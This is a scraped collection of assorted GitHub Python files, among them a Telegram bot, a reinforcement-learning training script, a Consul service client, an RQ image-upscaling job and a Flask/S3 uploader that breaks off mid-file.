31739800389 | from multiprocessing import Process
import time
class MyProcess(Process):
    """Worker process that logs its start and finish around a 1 s sleep."""
    def __init__(self,name):
        super().__init__()
        # Overwrites multiprocessing.Process's managed `name` property
        # so the prints below show the caller-supplied label.
        self.name=name
    def run(self):
        # Executed in the child process after start().
        print("%s is running" % self.name)
        time.sleep(1)
        print("%s is done" % self.name)
if __name__=="__main__":
p=MyProcess("subprocess_1")
p.start()
print("main process end") | bigcpp110/python_learning | 并发编程/process_class.py | process_class.py | py | 400 | python | en | code | 1 | github-code | 36 |
7056045662 | # class MyRangeInterator:
# def __init__(self,stop):
# self.number = 0
# self.stop = stop
#
# def __next__(self): #不能直接传递到函数要先传给类
# self.number += 1
# if self.number < self.stop:
# return self.number
# else:
# raise StopIteration()
class MyRange:
    """Minimal re-implementation of ``range(end)`` as an iterable.

    The counter now lives inside ``__iter__`` instead of on the
    instance, so the object can be iterated any number of times; the
    original consumed ``self.num`` and yielded nothing on a second pass.
    """
    def __init__(self, end):
        self.end = end
        self.num = 0  # kept for backward compatibility with old callers
    def __iter__(self):
        # A fresh local counter per call makes the iterable reusable.
        num = 0
        while num < self.end:
            yield num
            num += 1
for item in MyRange(5): # 0~4
print(item) | haiou90/aid_python_core | day16/exercise_personal/06_exercise.py | 06_exercise.py | py | 583 | python | en | code | 0 | github-code | 36 |
6369818660 | '''
This script compiles the requirements for the bot and runs it on a loop
It should also contain the functions of the bot
'''
from config import *
from core import *
import telegram
import datetime
import time
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, \
ConversationHandler, CallbackQueryHandler
import logging
import random
from pytz import timezone
import emojis
import argparse
import utils.db_utils as db_utils
import argparse
print('initialising')
# checks if this should be run ion testing env
parser = argparse.ArgumentParser(description='Runs the leobot service')
parser.add_argument('-t', '--testing', type=bool, help='Whether you want to run in testing env')
args = parser.parse_args()
# setting up deployment environment env (REMOVE IF YOU ARE NOT USING env FILE BUT IT IS GOOD PRACTICE)
testing = args.testing
print('Testing value:', testing)
import configparser
config = configparser.ConfigParser()
config.read('bot.cfg')
if testing:
bot_config = dict(config['test_bot'])
print(str(config))
dbi = db_utils.Database(config, 'test_db')
else:
bot_config = config['live_bot']
dbi = db_utils.Database(config, 'live_db')
# TODO: ACTUAL DEPLOYMENT CHANGE
owner = config['owners']['fei']
updater = Updater(token=bot_config['token'], use_context=True)
dispatcher = updater.dispatcher # for quicker access to the dispatcher object
jobqueuer = updater.job_queue # for quicker access to JobQueue object
# logs the problems in log.md file with level INFO
logging.basicConfig(filename='storage/error_log.txt', format='%(asctime)s - %(name)s - \
%(levelname)s - %(message)s', level=logging.INFO)
print('finish setting up logging')
core_utils.setup_bot_data(dispatcher, owner, bot_config, dbi, testing)
msg_return = dispatcher.bot.send_message(owner, bot_init_msg) # informs the owners that it is intialised
print('Message Return', str(msg_return))
################
# TESTING ZONE #
################
# dbi.new_category('Testimony', des= 'Heartfelt personal sharing')
# dbi.cat_id('Testimony')
# def process_members(update, context):
# '''
# Processes the changes in member data i.e. when the user first starts the bot.
# This function being in group 0 make sure it is the highest priority and runs in parallel with other
# callback functions
# '''
# # for easier access to user_id
# user_id = update.message.from_user.id
# # initiates the user if it is his first time
# initiate_user(user_id, update, context) # in utils
# # updates the permission according to quits by the coder
# # check_for_personal_changes(update, context)
# dispatcher.add_handler(MessageHandler(Filters.text, process_members), group=0) # gives most prirority
new_thread_conv = ConversationHandler(
entry_points=[CommandHandler('new_thread', new_thread)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, t_title)],
CAT: [MessageHandler(Filters.text & ~Filters.command, t_cat)],
BODY: [MessageHandler(Filters.text & ~Filters.command, t_body)],
FILE: [core_utils.file_handler(t_file),
CommandHandler('no', t_file)],
TAGS: [MessageHandler(Filters.text & ~Filters.command, t_tags)],
TC: [MessageHandler(Filters.text & ~Filters.command, tc_next)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
feedback_conv = ConversationHandler(
entry_points=[CommandHandler('feedback', fb_init)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, \
fb_title)],
BODY: [MessageHandler(Filters.text & ~Filters.command, fb_body)],
FILE: [core_utils.file_handler(fb_file),
CommandHandler('no', fb_file)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
admin_conv = ConversationHandler(
entry_points=[CommandHandler('admin_menu', admin_menu)],
states={
MENU: [CommandHandler('sview_fb', sview_fb),
CommandHandler('dview_fb', dview_fb),
CommandHandler('ch_perm', ch_perm),
CommandHandler('all_members', all_members),
CommandHandler('del_threads', del_threads)
],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
be_conv = ConversationHandler(
entry_points=[CommandHandler('backend', admin_menu)],
states={
MENU: [],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
start_conv = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
MENU: [
new_thread_conv,
feedback_conv,
admin_conv,
],
END: [CommandHandler('start', start)],
TIMEOUT: [MessageHandler(Filters.text, timeout)]
},
fallbacks= [CommandHandler('end', end)],
conversation_timeout=600
)
# def not_command(update, context):
# '''
# Processes messages that are not commands i.e. a response to a prompt by the bot
# Make sure this is the last callback function to grant lowest priority to because this means that
# the person is clearly not trying to call another function
# '''
# update.message.reply_text('Not real command')
# dispatcher.add_handler(MessageHandler(Filters.command, not_command), group=1)
dispatcher.add_handler(CommandHandler('help', help_fns))
dispatcher.add_handler(CommandHandler('cache', cache))
dispatcher.add_handler(start_conv)
def remind_events(context):
    """Daily JobQueue callback (08:00 SGT): sends daily_msg to owners.

    :param context: CallbackContext handed in by telegram.ext.JobQueue.
    """
    # TODO: Make bot record events and remind people
    inform_owners(daily_msg, context)
event_reminder = jobqueuer.run_daily(callback=remind_events,\
time=datetime.time(8, 0, 0, 0, tzinfo=timezone('Singapore')))
updater.start_polling()
dbi.close()
| ollayf/leobot | main.py | main.py | py | 6,203 | python | en | code | 2 | github-code | 36 |
846869458 | import argparse
import json
import os
from datetime import datetime
from statistics import mean
import chainer
import chainerrl
import numpy as np
from chainerrl.wrappers import CastObservationToFloat32, ScaleReward
from estimator import RecoNet, ThreatEstimator
from q_func import RPDQN, QFunction, RPQFunction
from util import Environment, default_circuit
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='run.py',
description='run learning',
add_help=True
)
parser.add_argument('--gpu', dest='gpu', action='store_true')
parser.add_argument('--seed', dest='seed', default=0, type=int)
parser.add_argument('--load', dest='load', default='', type=str)
parser.add_argument('--normal', dest='normal', action='store_true')
parser.add_argument('--adameps', dest='adam_eps', default=1e-2, type=float)
parser.add_argument('--adamalpha', dest='adam_alpha',
default=1e-3, type=float)
parser.add_argument('--gamma', dest='gamma', default=0.90, type=float)
parser.add_argument('--alllog', dest='all_log', action='store_true')
parser.add_argument('--lmd', dest='lmd', default=200, type=int)
parser.add_argument('--scale', dest='scale', default=1.0, type=float)
parser.add_argument('--firsteps', dest='firsteps', default=1.0, type=float)
parser.add_argument('--step', dest='step', default=3 * 10 ** 6, type=int)
parser.add_argument('--demo', dest='demo', action='store_true')
parser.add_argument('--render', dest='ren', action='store_true')
parser.add_argument('--eval', dest='eval', type=str, default='')
parser.add_argument('-t', dest='times', default=100, type=int)
args = parser.parse_args()
gpus = (0,) if args.gpu else ()
chainerrl.misc.set_random_seed(args.seed, gpus)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
result_dir = os.path.join('results/circuit', timestamp)
os.makedirs(result_dir)
with open(os.path.join(result_dir, 'args.json'), 'w') as f:
json.dump(args.__dict__, f, indent=2)
circuit = default_circuit()
rand = False if args.demo else True
env = Environment(circuit=circuit,
random_init=rand, result_dir=result_dir, file='crash_train.log', all_log=args.all_log,
lmd=args.lmd, render=args.ren)
n_actions = len(env.agent.action_list)
env = ScaleReward(env, args.scale)
reconet = RecoNet()
estimator = ThreatEstimator(
reconet, 'circuit/threat.model', args.gpu)
danger_limit = 1e-3
step = args.step
if args.normal:
q_func = QFunction(n_actions)
else:
q_func = RPQFunction(n_actions, estimator,
danger_limit)
optimizer = chainer.optimizers.Adam(
eps=args.adam_eps, alpha=args.adam_alpha)
optimizer.setup(q_func)
explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(
args.firsteps, 0.05, step, random_action_func=lambda: np.random.randint(n_actions))
replay_buffer = chainerrl.replay_buffer.PrioritizedReplayBuffer(1e6)
if args.normal:
agent = chainerrl.agents.DoubleDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
else:
agent = RPDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
env.unwrapped.result_agent = agent
if args.demo:
if args.load:
agent.load(args.load)
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
env.unwrapped.render()
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
print('Reward:', total)
elif args.eval:
        def gen_dir_name(jobid):
            # NOTE(review): `jobid` is unused -- presumably a leftover
            # parameter; confirm before removing it.
            # Yields '' first (meaning "the agent as loaded"), then one
            # directory per 10**5-step snapshot, then the final one.
            times = step // 10**5
            yield ''
            dirname = args.eval + '/'
            for i in range(times - 1):
                yield dirname + 'agent' + str(i + 1)
            yield dirname + str(int(step)) + '_finish'
crash_ratio = []
reward_list = []
steps = np.arange(0, step + 1, 10**5)
for agent_dir_name in gen_dir_name(args.eval):
if agent_dir_name:
agent.load(agent_dir_name)
print('agent:', agent_dir_name)
env = Environment(circuit=circuit,
random_init=True, result_dir=result_dir,
file='crash_train.log', all_log=args.all_log,
lmd=args.lmd)
total_episode_reward = []
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
if not env.crashed:
total_episode_reward.append(total)
ave_reward = mean(total_episode_reward) if len(
total_episode_reward) > 0 else np.nan
ratio = env.crash_cnt / args.times
print('result: crash_cnt ', ratio,
' pure_reward ', ave_reward, end='\n\n')
crash_ratio.append(ratio)
reward_list.append(ave_reward)
crash_ratio = np.array(crash_ratio)
reward_list = np.array(reward_list)
data = np.vstack((steps, crash_ratio))
data2 = np.vstack((steps, reward_list))
print(data)
np.save(os.path.join(result_dir, 'crash.npy'), data)
print(data2)
np.save(os.path.join(result_dir, 'reward.npy'), data2)
else:
if args.load:
agent.load(args.load)
chainerrl.experiments.train_agent_with_evaluation(
agent, env, steps=step, eval_n_steps=None, eval_n_episodes=1,
train_max_episode_len=200, eval_interval=1e4, outdir=result_dir,
eval_env=Environment(circuit=circuit, result_dir=result_dir, file='crash_test.log',
all_log=True, lmd=200))
| pfnet-research/rp-safe-rl | circuit/run.py | run.py | py | 6,662 | python | en | code | 7 | github-code | 36 |
15139442018 | from lexikanon import HyFI
from lexikanon.stopwords import Stopwords
def test_stopwords():
    """Exercise Stopwords built from config and via HyFI instantiation.

    Both paths pin the English NLTK stopword list and expect 179
    entries -- NOTE(review): that count depends on the pinned nltk data
    version; confirm when upgrading.
    """
    print(HyFI.get_caller_module_name())
    cfg = HyFI.compose_as_dict("stopwords")
    print(cfg)
    cfg["nltk_stopwords_lang"] = "english"
    stop = Stopwords(**cfg)
    print(stop)
    print(list(stop))
    assert len(stop) == 179
    # Same expectation when HyFI builds the object from config overrides.
    stop = HyFI.instantiate_config(
        "stopwords",
        overrides=["stopwords.nltk_stopwords_lang=english"],
    )
    assert len(stop) == 179
if __name__ == "__main__":
test_stopwords()
| entelecheia/lexikanon | tests/lexikanon/stopwords/test_stopwords.py | test_stopwords.py | py | 532 | python | en | code | 0 | github-code | 36 |
19757364925 | #! usr/bin/env/python
# Cache Enforcer (for Spotify)
# Spotify took away the option for controlling the cache size, so I'm doing it for them.
# Written by Josh Chan
import os
import shutil
# CONSTANTS
TARGET_DIR = "/Users/joshuapaulchan/Library/Caches/com.spotify.client/Data/" # currently, mac only
# Use ** (power), not ^ (XOR): `1024 ^ 3` evaluated to 1027, so the
# allowance was ~1 KB and the cache was wiped on almost every run.
SIZE_ALLOWANCE = 1 * ( 1024 ** 3 ) # 1 GiB cap on the cache size
DEV = bool(os.environ.get('DEV', False)) # truthy for any non-empty DEV value
def log(statement):
    """
    `log(statement)`
    Print *statement* to stdout, but only when the DEV flag is set.
    @params: statement: str: statement to log
    @returns: none
    """
    if not DEV:
        return
    print(statement)
def total_size(dir_path):
    """
    `total_size(dir_path)`
    Recursively sum the sizes of all files under a directory tree.
    @params: dir_path: str: the directory to calculate the size of
    @returns: size: int: size of the directory contents in bytes
    """
    size = 0
    for root, _dirs, names in os.walk(dir_path):
        size += sum(os.path.getsize(os.path.join(root, name)) for name in names)
    return size
def rmdir(dir_path):
    """
    `rmdir(dir_path)`
    Recursively remove the directory @ dir_path
    @params: dir_path: str: The directory to remove
    @returns: none
    """
    def _log_error(func, path, exc_info):
        # shutil.rmtree calls its onerror hook with three arguments; the
        # old code passed `log` directly, which takes one argument and
        # so raised a TypeError whenever a deletion actually failed.
        log("rmdir: could not remove {}: {}".format(path, exc_info[1]))
    shutil.rmtree(dir_path, onerror=_log_error)
def main():
    """Check the Spotify cache size and purge it when over the allowance."""
    cache_bytes = total_size(TARGET_DIR)
    if cache_bytes <= SIZE_ALLOWANCE:
        return
    rmdir(TARGET_DIR)
    print("Removed {} GB from Spotify's caches".format(cache_bytes / (1024 ** 3)))
if __name__ == '__main__':
main()
| joshpaulchan/tidy | beatdown-spotify.py | beatdown-spotify.py | py | 1,744 | python | en | code | 0 | github-code | 36 |
72482584103 | from fhcrc_pathology.OneFieldPerSpecimen import OneFieldPerSpecimen
import global_strings as gb
class HighRiskFinding(OneFieldPerSpecimen):
    ''' extract other, high risk findings (atypia, etc) '''
    __version__ = 'HighRiskFinding1.0'
    def __init__(self):
        super(HighRiskFinding, self).__init__()
        # Output field name and destination table for extracted values.
        self.overall_field_name = 'HighRiskFinding'
        self.overall_table = gb.PATHOLOGY_TABLE
        # Confidence score attached to specimen-level matches; 'all' presumably
        # means every pattern must match -- semantics live in the
        # OneFieldPerSpecimen base class (NOTE(review): confirm there).
        self.specimen_confidence = 0.9
        self.match_style = 'all'
        ## reference lists & dictionaries ##
        # Stem of the pattern file(s) this extractor loads.
        self.file_name_string = 'high_risk'
        ## relevant sections of the report ##
        # Regexes selecting report sections to search (good) or ignore (bad).
        self.good_section = r'IMPRESSION|FINAL DIAGNOSIS|COMMENT|FINAL DX|SUMMARY CANCER'
        self.bad_section = r'CLINICAL|Note'
22016755038 | import pandas as pd
import numpy as np
from scipy.io import savemat
import os
def csv_to_spm_vectors(csv_path):
    """Convert per-subject onset/duration CSVs under *csv_path* to SPM .mat files.

    Each ``*.csv`` is semicolon-delimited with ``onsets`` and ``durations``
    columns whose cells hold bracketed, whitespace/comma-separated number
    lists (e.g. ``"[1, 2\\n 3]"``). For every CSV a ``<sub>_vectors.mat``
    file is written inside *csv_path*.
    """
    def _parse_vector(cell):
        # "[1, 2\n 3]" -> np.array([1., 2., 3.])
        tokens = cell.replace("\n", "").replace(",", "")[1:-1].split(" ")
        return np.array([t for t in tokens if t], dtype=np.float64)

    for root, dirs, files in os.walk(csv_path):
        for name in files:
            if not name.endswith(".csv"):
                continue
            csv_file = os.path.join(root, name)
            df = pd.read_csv(csv_file, delimiter=";")
            # NOTE(review): assumes file names look like "subXXX.csv" so the
            # last 10 chars minus the extension are the subject id -- confirm.
            sub_name = csv_file[-10:-4]
            for key in ("onsets", "durations"):
                # Rebuild the whole column in one assignment instead of the
                # original chained item assignment (df[key][ii] = ...), which
                # is unreliable under pandas copy-on-write.
                df[key] = [_parse_vector(cell) for cell in df[key]]
            new_dict = {"sub": sub_name,
                        "sync_onset": df["onsets"][0],
                        "osync_onset": df["onsets"][1],
                        "mine_onset": df["onsets"][2],
                        "other_onset": df["onsets"][3],
                        "sync_duration": df["durations"][0],
                        "osync_duration": df["durations"][1]}
            # os.path.join instead of raw concatenation so the output lands
            # inside csv_path even when the caller omits the trailing slash.
            output_name = os.path.join(csv_path, sub_name + "_vectors.mat")
            savemat(output_name, {"vectors": new_dict})
4289870302 | # consul_client.py
import consul
import socket
import time
import threading
import json
import re
import random
from flask import Flask
from typing import Dict, List, Union
from dzmicro.utils import compare_dicts
class WatchKVThread(threading.Thread):
    """Background thread that polls Consul KV under a prefix and fires
    add/modify/delete callbacks when the stored dictionaries change.

    NOTE(review): `self._stop` shadows internals of threading.Thread on some
    Python versions -- confirm this is safe for the targeted interpreter.
    """
    def __init__(self, uuid: str, is_platform: bool) -> None:
        super().__init__(name=f'WatchKV')
        self.uuid = uuid
        self.is_platform = is_platform
        self._stop = False    # cooperative shutdown flag checked by run()
        self._kv = {}         # last snapshot of the watched KV subtree
    def set_server_unique_info(self) -> None:
        # Imported lazily to avoid a circular import with dzmicro.utils.
        from dzmicro.utils import singleton_server_manager
        self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
        self._prefix = self.server_unique_info.consul_info.get_prefix()
    def stop(self) -> None:
        """Request the polling loop to exit after the current iteration."""
        self._stop = True
    def on_config_changed(self, config_dict: Dict[str, any], change: str) -> None:
        """Register keywords/commands from newly added `<prefix><svc>/config` keys."""
        bot_commands = self.server_unique_info.bot_commands
        if change == 'add':
            pattern = fr"{self._prefix}(\w+)/config"
            for key, value in config_dict.items():
                match = re.search(pattern, key)
                if match:
                    service_name = f'DBot_{match.group(1)}'
                    keyword = value.get('keyword')
                    bot_commands.add_keyword(keyword, service_name)
                    commands = value.get('commands')
                    if service_name and commands:
                        for command in commands:
                            bot_commands.add_commands(keyword, command)
    def on_listener_changed(self, listener_dict: Dict[str, any], change: str) -> None:
        """Mirror `<prefix><svc>/listeners` changes into the shared listener manager."""
        from dzmicro.utils import singleton_server_manager
        server_shared_info = singleton_server_manager.get_server_shared_info()
        listener_manager = server_shared_info.listener_manager
        pattern = fr"{self._prefix}(\w+)/listeners"
        for key, value in listener_dict.items():
            match = re.search(pattern, key)
            if match:
                if change == 'add':
                    service_name = f'DBot_{match.group(1)}'
                    # TODO: should we verify service_name matches the one stored inside value?
                    listener_manager.update_listeners(value)
                elif change == 'modify':
                    # TODO: extend listener_manager.update_listeners so it can
                    # handle add vs. modify on its own. For now: remove old, add new.
                    listener_manager.update_listeners(value.get('old'), is_rm=True)
                    listener_manager.update_listeners(value.get('new'))
                elif change == 'delete':
                    listener_manager.update_listeners(value, is_rm=True)
    def on_add_kv(self, added_dict: Dict[str, any]) -> None:
        """Handle keys that appeared since the last poll."""
        print(f'添加\n{added_dict}\n')
        self.on_config_changed(added_dict, 'add')
        self.on_listener_changed(added_dict, 'add')
    def on_deleted_kv(self, deleted_dict: Dict[str, any]) -> None:
        """Handle keys that disappeared since the last poll."""
        # TODO: handle deletion of config files
        print(f'删除\n{deleted_dict}\n')
        self.on_config_changed(deleted_dict, 'delete')
        self.on_listener_changed(deleted_dict, 'delete')
    def on_modified_kv(self, modified_dict: Dict[str, any]) -> None:
        """Handle keys whose values changed since the last poll."""
        # TODO: handle modification of config files
        print(f'修改\n{modified_dict}\n')
        self.on_config_changed(modified_dict, 'modify')
        self.on_listener_changed(modified_dict, 'modify')
    def run(self) -> None:
        """Poll the KV subtree once a second, diff it, and dispatch callbacks."""
        consul_client = self.server_unique_info.consul_client
        while not self._stop:
            new_kv = {}
            while True:
                try:
                    # Fetch every key under the watched prefix.
                    # TODO: the prefix itself could also be configured via KV.
                    keys = consul_client.download_key_value(self._prefix, [], True)
                    break
                except:
                    # NOTE(review): bare except also swallows KeyboardInterrupt.
                    print('下载字典失败,正在重试')
                    time.sleep(1)
            # Read each key's value and collect the results into a dict.
            for key in keys:
                while True:
                    try:
                        json_data = consul_client.download_key_value(key, '')
                        new_kv[key] = json_data
                        break
                    except:
                        print('下载字典失败,正在重试')
                        time.sleep(1)
            added, deleted, modified = compare_dicts(self._kv, new_kv)
            if added:
                self.on_add_kv(added)
            if deleted:
                self.on_deleted_kv(deleted)
            if modified:
                self.on_modified_kv(modified)
            self._kv = new_kv
            time.sleep(1)
class ConsulClient:
    """Thin wrapper around python-consul: service registration/discovery plus
    KV upload/download helpers used by the dzmicro services."""
    def __init__(self, uuid: str, is_platform: bool = False, host: str = 'localhost', port: int = 8500) -> None:
        # TODO: assert that consul_info has been loaded first
        self.uuid = uuid
        self.is_platform = is_platform
        self.consul = consul.Consul(host=host, port=port)
    def set_server_unique_info(self) -> None:
        # Lazy import avoids a circular dependency with dzmicro.utils.
        from dzmicro.utils import singleton_server_manager
        self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
        self.prefix = self.server_unique_info.consul_info.get_prefix()
        self.consul.token = self.server_unique_info.consul_info.get_token()
    def register_service(self, service_name: str, service_port: Union[str, int], service_tags: List[str] = []) -> str:
        """Register this host's service with Consul and return the service id.

        An HTTP health check against /health is attached (10s interval).
        """
        service_id = f'{service_name}-{socket.gethostname()}'
        service_address = socket.gethostbyname(socket.gethostname())
        service_check = consul.Check.http(url=f'http://{service_address}:{service_port}/health', interval='10s')
        self.consul.agent.service.register(name=service_name, service_id=service_id, address=service_address, port=service_port, tags=service_tags, check=service_check)
        return service_id
    def update_key_value(self, dict_to_upload: Dict[str, any]) -> None:
        """Upload every (key, value) pair to Consul KV, retrying until success."""
        for key, value in dict_to_upload.items():
            while True:
                try:
                    value_json = json.dumps(value)
                    self.consul.kv.put(key, value_json.encode('utf-8'))
                    break
                except consul.base.ConsulException:
                    print(f'上传字典{dict}失败,正在重试')
                    time.sleep(1)
    def download_key_value(self, key: str, default: any = None, keys: bool = False) -> any:
        """Fetch a value (or, with keys=True, the list of keys) from Consul KV.

        Returns *default* when the key does not exist.
        """
        index, data = self.consul.kv.get(key, keys=keys)
        if data:
            if keys:
                return data
            else:
                value_json = data['Value'].decode('utf-8')
                value = json.loads(value_json)
                return value
        else:
            return default
    def deregister_service(self, service_id: str) -> None:
        """Deregister a service by id.

        NOTE(review): this definition is shadowed by the Flask-app variant
        further down the class and is therefore dead code; kept for reference.
        """
        self.consul.agent.service.deregister(service_id)
    def discover_services(self, service_name: str) -> List[List[str]]:
        """Return [address, port] for every healthy instance of *service_name*."""
        # TODO: consider caching lookups, refreshed when WatchKVThread sees changes.
        try:
            services = self.consul.health.service(service_name, passing=True)[1]
            return [[service.get('Service', {}).get('Address', ''), service.get('Service', {}).get('Port', '')] for service in services]
        except Exception:  # narrowed from bare except so Ctrl-C still works
            return [[]]
    def discover_service(self, service_name: str) -> Union[List[List[str]], None]:
        """Return one randomly chosen healthy instance, or None when there are none."""
        services = self.discover_services(service_name)
        if not services:
            return None
        return random.choice(services)
    def check_port_available(self, sname: str, sip: str, sport: Union[int, str]) -> bool:
        """Return False when (sip, sport) is already claimed by a different service."""
        if sip == '0.0.0.0' or sip == '127.0.0.1':
            sip = socket.gethostbyname(socket.gethostname())
        # Collect every registered service instance's (ip, port).
        services = self.consul.agent.services()
        service_instances = {}
        for service_id in services:
            service_name = services[service_id]['Service']
            _, instances = self.consul.health.service(service_name, passing=True)
            for instance in instances:
                ip = instance['Service']['Address']
                port = instance['Service']['Port']
                if service_name not in service_instances:
                    service_instances[service_name] = []
                service_instances[service_name].append((ip, port))
        # A clash only matters when another *name* owns the same endpoint.
        for name, instances in service_instances.items():
            for ip, port in instances:
                if sip == ip and sport == port and sname != name:
                    print(f'{ip}:{port}已被{name}占用')
                    return False
        return True
    def register_consul(self, app: Flask, name: str, port: Union[str, int], tags: List[str]) -> None:
        '''
        Register with Consul before the service starts; remembers the id on the app.
        '''
        id = self.register_service(name, port, tags)
        app.config.update({'id': id})
    def deregister_service(self, app: Flask) -> None:
        '''
        Deregister from Consul after the service stops.

        Fixed: the original body called `self.deregister_service(self, id)`,
        which (because this definition shadows the service_id variant above)
        re-entered *this* method with an extra argument and raised TypeError.
        We now talk to the Consul agent directly.
        '''
        id = app.config['id']
        self.consul.agent.service.deregister(id)
23164271375 | from PIL import Image, ImageOps
import cv2
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import time
import pandas as pd
# import json
from IPython.display import clear_output
# Wider tensor printing for debugging; gradients enabled globally (the default).
torch.set_printoptions(linewidth=120)
torch.set_grad_enabled(True)
# Haar-cascade face detector shipped with OpenCV.
face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')
class Network(nn.Module):
    """Small CNN: two conv/pool stages feeding a three-layer classifier head.

    Expects single-channel 48x48 inputs (so the flattened feature map is
    12 * 9 * 9) and produces 7 class logits.
    """

    def __init__(self):
        super().__init__()
        self.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5)
        self.conv2 = nn.Conv2d(in_channels=6, out_channels=12, kernel_size=5)
        self.fc1 = nn.Linear(in_features=12 * 9 * 9, out_features=120)
        self.fc2 = nn.Linear(in_features=120, out_features=60)
        self.out = nn.Linear(in_features=60, out_features=7)

    def forward(self, t):
        # conv -> relu -> 2x2 max-pool, twice
        t = F.max_pool2d(F.relu(self.conv1(t)), kernel_size=2, stride=2)
        t = F.max_pool2d(F.relu(self.conv2(t)), kernel_size=2, stride=2)
        # flatten, then the fully connected head (logits, no softmax)
        t = t.reshape(-1, 12 * 9 * 9)
        t = F.relu(self.fc1(t))
        t = F.relu(self.fc2(t))
        return self.out(t)
class webopencv(object):
    """Helper that re-saves a pickled model as a plain state-dict file."""
    def __init__(self):
        pass

    def process(self):
        # Load the fully pickled model and persist only its parameters --
        # the state-dict form is the more portable serialization.
        trained_model = torch.load("modelResults.pt")
        torch.save(trained_model.state_dict(), "model_state_dict.pt")
# Script entry: converts modelResults.pt into model_state_dict.pt on run/import.
w = webopencv()
w.process()
| jain-aniket/attentiveness-flask | testtorchloading.py | testtorchloading.py | py | 1,388 | python | en | code | 0 | github-code | 36 |
1409824498 | import threading
import time
from subprocess import Popen, PIPE, CalledProcessError
from redis import Redis
from rq import Queue
import sys
import os
import shutil
# Connect to the local Redis instance backing the RQ queue.
redis_conn = Redis(host='localhost', port=6379, db=0)
# Default RQ queue; jobs enqueued elsewhere are fetched by task_id below.
queue = Queue(connection=redis_conn)
def read_output(pipe, task_id):
    """Stream lines from *pipe*, mirroring the accumulated text into the
    RQ job's meta so clients can poll upscaling progress live."""
    job = queue.fetch_job(task_id)
    collected = ''
    for chunk in iter(pipe.readline, ''):
        collected += chunk
        sys.stderr.flush()
        # Persist after every line so progress is visible incrementally.
        job.meta['progress'] = collected
        job.save_meta()
def task(task_id, input_path, output_path, model_name, tta=False):
    """Run the upscayl binary on *input_path*, streaming its output into the
    RQ job's meta via read_output.

    Raises CalledProcessError on a non-zero exit. The input's parent
    directory is always removed afterwards, success or failure.
    """
    try:
        upscale_command = [
            './upscale/upscayl',
            '-i', input_path,
            '-o', output_path,
            '-n', model_name
        ]
        if tta:
            upscale_command.append("-x")  # enable test-time augmentation
        with Popen(upscale_command, stderr=PIPE, stdout=PIPE, bufsize=1, universal_newlines=True) as p:
            # Drain stdout/stderr on separate threads so neither pipe can
            # fill up and block the child process.
            stdout_thread = threading.Thread(target=read_output, args=(p.stdout, task_id))
            stderr_thread = threading.Thread(target=read_output, args=(p.stderr, task_id))
            stdout_thread.start()
            stderr_thread.start()
            # Wait for the subprocess, then for the readers to finish draining.
            p.wait()
            stdout_thread.join()
            stderr_thread.join()
            if p.returncode != 0:
                raise CalledProcessError(p.returncode, p.args)
    # The original wrapped this in `except Exception as e: raise e`, which
    # only mangled the traceback; try/finally alone re-raises unchanged.
    finally:
        if os.path.exists(input_path):
            shutil.rmtree(os.path.dirname(input_path))
| ASparkOfFire/fastapi-rq-example | job.py | job.py | py | 1,772 | python | en | code | 0 | github-code | 36 |
# Standard library
import json
import os
import time
import uuid
import zipfile
from datetime import datetime
from io import BytesIO

# Third-party
import boto3
import docx  # used by name in uploadDocument (docx.parts.image.ImagePart); `from docx.api import ...` alone does not bind `docx`
import flask
import pypandoc
from bs4 import BeautifulSoup
from docx.api import Document
from flask import request, jsonify
from flask_s3 import *
from werkzeug.utils import secure_filename

# Local
from s3_credential import *
# Flask app + S3 wiring; bucket name and AWS credentials come from the environment.
s3 = FlaskS3()
app = flask.Flask(__name__)
app.config["DEBUG"] = True
app.config['UPLOAD_FOLDER'] = os.path.join('word','media')
app.config['FLASKS3_BUCKET_NAME'] = os.environ.get("AWS_BUCKET_NAME")
app.config['AWS_ACCESS_KEY_ID'] = os.environ.get("AWS_ACCESS_KEY_ID")
app.config['AWS_SECRET_ACCESS_KEY'] = os.environ.get("AWS_SECRET_ACCESS_KEY")
app.config['FLASKS3_BUCKET_DOMAIN'] = 's3.ap-south-1.amazonaws.com'
s3.init_app(app)
# Low-level boto3 handles: client for presigned URLs, resource for uploads.
s3_boto = boto3.client('s3')
s3_res = boto3.resource("s3")
buck = s3_res.Bucket(os.environ.get("AWS_BUCKET_NAME"))
def generate_unique_name(length=10):
    """Return a timestamp-based image file name, e.g. ``img1700000000.png``.

    *length* is unused but kept for backward compatibility with callers.
    """
    # int(timestamp()) is portable; the original strftime("%s") is a
    # non-standard platform extension that fails on some systems.
    timestamp_got = str(int(datetime.now().timestamp()))
    unique_name = f"img{timestamp_got}.png"
    return unique_name
def get_url(key):
